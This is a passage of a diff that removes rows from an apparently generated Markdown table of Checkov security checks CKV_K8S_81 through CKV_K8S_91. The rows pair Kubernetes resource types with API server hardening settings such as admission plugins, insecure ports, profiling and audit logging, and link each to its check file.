-| 3006 | CKV_K8S_81               | resource                         | Job                                                                                              | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                  |
-| 3007 | CKV_K8S_81               | resource                         | Pod                                                                                              | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                  |
-| 3008 | CKV_K8S_81               | resource                         | PodTemplate                                                                                      | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                  |
-| 3009 | CKV_K8S_81               | resource                         | ReplicaSet                                                                                       | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                  |
-| 3010 | CKV_K8S_81               | resource                         | ReplicationController                                                                            | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                  |
-| 3011 | CKV_K8S_81               | resource                         | StatefulSet                                                                                      | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                  |
-| 3012 | CKV_K8S_82               | resource                         | CronJob                                                                                          | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                            |
-| 3013 | CKV_K8S_82               | resource                         | DaemonSet                                                                                        | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                            |
-| 3014 | CKV_K8S_82               | resource                         | Deployment                                                                                       | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                            |
-| 3015 | CKV_K8S_82               | resource                         | DeploymentConfig                                                                                 | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                            |
-| 3016 | CKV_K8S_82               | resource                         | Job                                                                                              | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                            |
-| 3017 | CKV_K8S_82               | resource                         | Pod                                                                                              | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                            |
-| 3018 | CKV_K8S_82               | resource                         | PodTemplate                                                                                      | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                            |
-| 3019 | CKV_K8S_82               | resource                         | ReplicaSet                                                                                       | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                            |
-| 3020 | CKV_K8S_82               | resource                         | ReplicationController                                                                            | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                            |
-| 3021 | CKV_K8S_82               | resource                         | StatefulSet                                                                                      | Ensure that the admission control plugin ServiceAccount is set                                                                                                                                           | Kubernetes              | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py)                                                            |
-| 3022 | CKV_K8S_83               | resource                         | CronJob                                                                                          | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                    |
-| 3023 | CKV_K8S_83               | resource                         | DaemonSet                                                                                        | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                    |
-| 3024 | CKV_K8S_83               | resource                         | Deployment                                                                                       | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                    |
-| 3025 | CKV_K8S_83               | resource                         | DeploymentConfig                                                                                 | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                    |
-| 3026 | CKV_K8S_83               | resource                         | Job                                                                                              | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                    |
-| 3027 | CKV_K8S_83               | resource                         | Pod                                                                                              | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                    |
-| 3028 | CKV_K8S_83               | resource                         | PodTemplate                                                                                      | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                    |
-| 3029 | CKV_K8S_83               | resource                         | ReplicaSet                                                                                       | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                    |
-| 3030 | CKV_K8S_83               | resource                         | ReplicationController                                                                            | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                    |
-| 3031 | CKV_K8S_83               | resource                         | StatefulSet                                                                                      | Ensure that the admission control plugin NamespaceLifecycle is set                                                                                                                                       | Kubernetes              | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py)                                                    |
-| 3032 | CKV_K8S_84               | resource                         | CronJob                                                                                          | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                      |
-| 3033 | CKV_K8S_84               | resource                         | DaemonSet                                                                                        | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                      |
-| 3034 | CKV_K8S_84               | resource                         | Deployment                                                                                       | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                      |
-| 3035 | CKV_K8S_84               | resource                         | DeploymentConfig                                                                                 | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                      |
-| 3036 | CKV_K8S_84               | resource                         | Job                                                                                              | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                      |
-| 3037 | CKV_K8S_84               | resource                         | Pod                                                                                              | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                      |
-| 3038 | CKV_K8S_84               | resource                         | PodTemplate                                                                                      | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                      |
-| 3039 | CKV_K8S_84               | resource                         | ReplicaSet                                                                                       | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                      |
-| 3040 | CKV_K8S_84               | resource                         | ReplicationController                                                                            | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                      |
-| 3041 | CKV_K8S_84               | resource                         | StatefulSet                                                                                      | Ensure that the admission control plugin PodSecurityPolicy is set                                                                                                                                        | Kubernetes              | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py)                                                      |
-| 3042 | CKV_K8S_85               | resource                         | CronJob                                                                                          | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                          |
-| 3043 | CKV_K8S_85               | resource                         | DaemonSet                                                                                        | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                          |
-| 3044 | CKV_K8S_85               | resource                         | Deployment                                                                                       | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                          |
-| 3045 | CKV_K8S_85               | resource                         | DeploymentConfig                                                                                 | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                          |
-| 3046 | CKV_K8S_85               | resource                         | Job                                                                                              | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                          |
-| 3047 | CKV_K8S_85               | resource                         | Pod                                                                                              | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                          |
-| 3048 | CKV_K8S_85               | resource                         | PodTemplate                                                                                      | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                          |
-| 3049 | CKV_K8S_85               | resource                         | ReplicaSet                                                                                       | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                          |
-| 3050 | CKV_K8S_85               | resource                         | ReplicationController                                                                            | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                          |
-| 3051 | CKV_K8S_85               | resource                         | StatefulSet                                                                                      | Ensure that the admission control plugin NodeRestriction is set                                                                                                                                          | Kubernetes              | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py)                                                          |
-| 3052 | CKV_K8S_86               | resource                         | CronJob                                                                                          | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                              |
-| 3053 | CKV_K8S_86               | resource                         | DaemonSet                                                                                        | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                              |
-| 3054 | CKV_K8S_86               | resource                         | Deployment                                                                                       | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                              |
-| 3055 | CKV_K8S_86               | resource                         | DeploymentConfig                                                                                 | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                              |
-| 3056 | CKV_K8S_86               | resource                         | Job                                                                                              | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                              |
-| 3057 | CKV_K8S_86               | resource                         | Pod                                                                                              | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                              |
-| 3058 | CKV_K8S_86               | resource                         | PodTemplate                                                                                      | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                              |
-| 3059 | CKV_K8S_86               | resource                         | ReplicaSet                                                                                       | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                              |
-| 3060 | CKV_K8S_86               | resource                         | ReplicationController                                                                            | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                              |
-| 3061 | CKV_K8S_86               | resource                         | StatefulSet                                                                                      | Ensure that the --insecure-bind-address argument is not set                                                                                                                                              | Kubernetes              | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py)                                                              |
-| 3062 | CKV_K8S_88               | resource                         | CronJob                                                                                          | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                            |
-| 3063 | CKV_K8S_88               | resource                         | DaemonSet                                                                                        | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                            |
-| 3064 | CKV_K8S_88               | resource                         | Deployment                                                                                       | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                            |
-| 3065 | CKV_K8S_88               | resource                         | DeploymentConfig                                                                                 | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                            |
-| 3066 | CKV_K8S_88               | resource                         | Job                                                                                              | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                            |
-| 3067 | CKV_K8S_88               | resource                         | Pod                                                                                              | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                            |
-| 3068 | CKV_K8S_88               | resource                         | PodTemplate                                                                                      | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                            |
-| 3069 | CKV_K8S_88               | resource                         | ReplicaSet                                                                                       | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                            |
-| 3070 | CKV_K8S_88               | resource                         | ReplicationController                                                                            | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                            |
-| 3071 | CKV_K8S_88               | resource                         | StatefulSet                                                                                      | Ensure that the --insecure-port argument is set to 0                                                                                                                                                     | Kubernetes              | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py)                                                                            |
-| 3072 | CKV_K8S_89               | resource                         | CronJob                                                                                          | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                |
-| 3073 | CKV_K8S_89               | resource                         | DaemonSet                                                                                        | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                |
-| 3074 | CKV_K8S_89               | resource                         | Deployment                                                                                       | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                |
-| 3075 | CKV_K8S_89               | resource                         | DeploymentConfig                                                                                 | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                |
-| 3076 | CKV_K8S_89               | resource                         | Job                                                                                              | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                |
-| 3077 | CKV_K8S_89               | resource                         | Pod                                                                                              | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                |
-| 3078 | CKV_K8S_89               | resource                         | PodTemplate                                                                                      | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                |
-| 3079 | CKV_K8S_89               | resource                         | ReplicaSet                                                                                       | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                |
-| 3080 | CKV_K8S_89               | resource                         | ReplicationController                                                                            | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                |
-| 3081 | CKV_K8S_89               | resource                         | StatefulSet                                                                                      | Ensure that the --secure-port argument is not set to 0                                                                                                                                                   | Kubernetes              | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py)                                                                                |
-| 3082 | CKV_K8S_90               | resource                         | CronJob                                                                                          | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                  |
-| 3083 | CKV_K8S_90               | resource                         | DaemonSet                                                                                        | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                  |
-| 3084 | CKV_K8S_90               | resource                         | Deployment                                                                                       | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                  |
-| 3085 | CKV_K8S_90               | resource                         | DeploymentConfig                                                                                 | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                  |
-| 3086 | CKV_K8S_90               | resource                         | Job                                                                                              | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                  |
-| 3087 | CKV_K8S_90               | resource                         | Pod                                                                                              | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                  |
-| 3088 | CKV_K8S_90               | resource                         | PodTemplate                                                                                      | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                  |
-| 3089 | CKV_K8S_90               | resource                         | ReplicaSet                                                                                       | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                  |
-| 3090 | CKV_K8S_90               | resource                         | ReplicationController                                                                            | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                  |
-| 3091 | CKV_K8S_90               | resource                         | StatefulSet                                                                                      | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py)                                                                                  |
-| 3092 | CKV_K8S_91               | resource                         | CronJob                                                                                          | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                    |
-| 3093 | CKV_K8S_91               | resource                         | DaemonSet                                                                                        | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                    |
-| 3094 | CKV_K8S_91               | resource                         | Deployment                                                                                       | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                    |
-| 3095 | CKV_K8S_91               | resource                         | DeploymentConfig                                                                                 | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                    |
-| 3096 | CKV_K8S_91               | resource                         | Job                                                                                              | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                    |
-| 3097 | CKV_K8S_91               | resource                         | Pod                                                                                              | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                    |
-| 3098 | CKV_K8S_91               | resource                         | PodTemplate                                                                                      | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                    |
-| 3099 | CKV_K8S_91               | resource                         | ReplicaSet                                                                                       | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                    |
